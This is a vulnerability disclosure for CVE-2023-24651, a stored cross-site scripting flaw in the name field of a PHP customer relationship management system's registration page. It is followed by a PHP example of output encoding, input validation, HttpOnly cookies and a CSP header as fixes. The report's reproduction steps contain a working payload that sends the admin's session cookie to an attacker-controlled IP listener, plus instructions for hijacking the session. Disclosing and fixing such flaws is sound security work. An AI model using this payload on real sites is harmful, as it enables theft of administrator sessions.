CVE/CVE-2023-24651/CVE-2023-24651.txt
| > [Suggested description] | |
| > Simple Customer Relationship Management System v1.0 was discovered to | |
| > contain a cross-site scripting (XSS) vulnerability via the name parameter on the | |
| > registration page. | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Additional Information] | |
| > Steps-To-Reproduce: | |
| > Step 1: Go to the registration page http://localhost/php-scrm/registration.php | |
| > Step 2: Now fill out the registration form and put the payload in the name field. | |
| >         Payload: <img src=x onerror=this.src=`http://192.168.1.208:1234/?c=`+document.cookie> | |
| > Step 3: Now click on the Create Account button. | |
| > Step 4: Now start the Python web server on the attacker system. | |
| >         # python -m http.server 1234 | |
| > Step 5: Now when the admin logs in to the admin panel and navigates to the Users tab to manage users (http://localhost/php-scrm/admin/manage-users.php) from the dashboard, the XSS payload is executed and the attacker gets the admin cookie on the attacker's web server. | |
| > Step 6: Now navigate to the admin login page http://127.0.0.1/php-scrm/login.php in a new private window. | |
| > Step 7: Now copy the cookie which we get on the Python web server when the XSS payload is executed. | |
| > Step 8: Now change the PHPSESSID value to the copied cookie, like "vupi1sfffgpla0tt0hijfpeneq", and save it with the cookie editor. | |
| > Step 9: Now navigate to the admin dashboard by the following URL: http://localhost/php-scrm/admin/home.php | |
| > Step 10: The admin user session is successfully hijacked. | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Vulnerability Type] | |
| > Cross Site Scripting (XSS) | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Vendor of Product] | |
| > https://www.sourcecodester.com | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Affected Product Code Base] | |
| > Simple Customer Relationship Management (CRM) System - 1.0 | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Affected Component] | |
| > http://localhost/php-scrm/registration.php | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Attack Type] | |
| > Remote | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Impact Code execution] | |
| > true | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Impact Escalation of Privileges] | |
| > true | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Impact Information Disclosure] | |
| > true | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Attack Vectors] | |
| > Cross-Site Scripting (XSS) is a type of cyber attack that allows an attacker to inject malicious code into a website. When a victim visits the compromised website, the injected code is executed by the victim's web browser, allowing the attacker to steal sensitive information such as login credentials, steal cookies, or perform other malicious actions. | |
| > | |
| > Stored XSS is a type of XSS that involves injecting malicious code into a website's persistent storage, such as a database, which is then served to users when they access the website. | |
| > | |
| > Form-based Cross-Site Scripting (XSS) attacks can have serious consequences for both individuals and organizations. By injecting malicious code into a website through a form field, an attacker can potentially steal sensitive information and an admin cookie, redirect victims to malicious websites, execute unauthorized actions on behalf of the victim, and even inject additional malicious code into the website to continue executing malicious actions. | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Reference] | |
| > https://www.sourcecodester.com/php/15895/simple-customer-relationship-management-crm-system-using-php-free-source-coude.html | |
| > https://www.sourcecodester.com/sites/default/files/download/oretnom23/php-scrm.zip | |
| > | |
| > ------------------------------------------ | |
| > | |
| > [Discoverer] | |
| > Yogesh Verma | |
| Use CVE-2023-24651. |
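
One way to close the stored XSS described in the report, as an added example that is not code from php-scrm or from the reporter: encode the stored name where the admin user list is rendered, validate it at registration, and keep PHPSESSID out of reach of `document.cookie`. All function names, the row layout, the sample rows and the CSP value are assumptions.

```php
<?php
declare(strict_types=1);
// Added example. Function names and the table layout are hypothetical,
// not taken from php-scrm.

// HttpOnly keeps PHPSESSID out of document.cookie; call before any output.
function start_hardened_session(): void {
    session_set_cookie_params([
        'httponly' => true,
        'secure'   => !empty($_SERVER['HTTPS']),
        'samesite' => 'Lax',
    ]);
    session_start();
}

// Defense in depth: without 'unsafe-inline', inline handlers such as onerror
// do not run, and img-src 'self' blocks image loads from other origins.
function send_csp(): void {
    header("Content-Security-Policy: default-src 'self'; img-src 'self'");
}

// Output encoding for HTML text and quoted attribute values.
function e(string $value): string {
    return htmlspecialchars($value, ENT_QUOTES | ENT_SUBSTITUTE | ENT_HTML5, 'UTF-8');
}

// Allowlist for the registration name: letters, marks, space, . ' -
function valid_name(string $name): bool {
    return preg_match('/^[\p{L}\p{M}][\p{L}\p{M} .\'\-]{0,99}$/uD', $name) === 1;
}

// Every stored field is encoded at the point it is written into the page.
function render_user_row(array $user): string {
    return '<tr><td>' . e($user['name']) . '</td><td>' . e($user['email']) . '</td></tr>';
}

if (PHP_SAPI !== 'cli') {   // in a web request: harden the session first
    start_hardened_session();
    send_csp();
}
$rows = [                   // constructed sample data
    ['name' => "Asha O'Neil", 'email' => 'asha@example.test'],
    ['name' => '<img src=x onerror=alert(1)>', 'email' => 'probe@example.test'],
];
foreach ($rows as $row) {
    echo valid_name($row['name']) ? 'accept ' : 'reject ', render_user_row($row), PHP_EOL;
}
```

Output encoding in `render_user_row` is the fix for the rendering flaw itself; the allowlist, the HttpOnly cookie and the CSP header limit what a missed encoding call can expose.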